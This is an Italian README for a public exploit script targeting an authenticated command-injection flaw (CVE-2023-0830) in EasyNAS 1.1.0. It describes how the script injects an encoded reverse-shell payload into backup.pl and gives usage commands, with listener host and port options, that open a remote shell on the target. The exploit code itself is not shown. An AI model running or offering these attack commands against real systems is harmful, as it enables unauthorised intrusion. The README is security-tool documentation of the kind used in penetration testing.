
Exploit per EasyNAS versione 1.1.0. La vulnerabilità sfruttata è una falla di iniezione di comandi, che richiede autenticazione.
Questo script Python è un potente exploit per EasyNAS versione 1.1.0 con funzionalità avanzate, incluso un listener integrato. La vulnerabilità sfruttata è una falla di injection di comandi, che richiede autenticazione.
Lo script stabilisce una sessione con il server di destinazione, quindi invia una richiesta di login con le credenziali fornite dall'utente. Dopo l'autenticazione riuscita, lo script costruisce un payload che, una volta eseguito, apre una connessione reverse shell a un IP e una porta specificati dall'utente. Questo payload viene codificato in URL e Base64 e poi iniettato nel file backup.pl sul server tramite una richiesta GET appositamente costruita.
Ivan Spiridonov (xbz0n) https://xbz0n.sh
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444
--mode {shell,reverse} Exploitation mode: shell (integrated reverse shell) or reverse (external listener)
--lhost IP_ADDRESS IP address for the reverse shell listener (auto-detected by default)
--lport PORT Port for the reverse shell listener (default: 4444)
--protocol {http,https} Protocol to use (default: https)
--verbose Enable verbose output
--shell {bash,sh,python} Specify the shell type to use with integrated listener (default: bash)
Questo script è solo per scopi educativi e test di penetrazione autorizzati. Richiedere sempre un'autorizzazione esplicita prima di eseguire qualsiasi test di penetrazione contro una rete o un sistema.
Si prega di utilizzarlo in modo responsabile.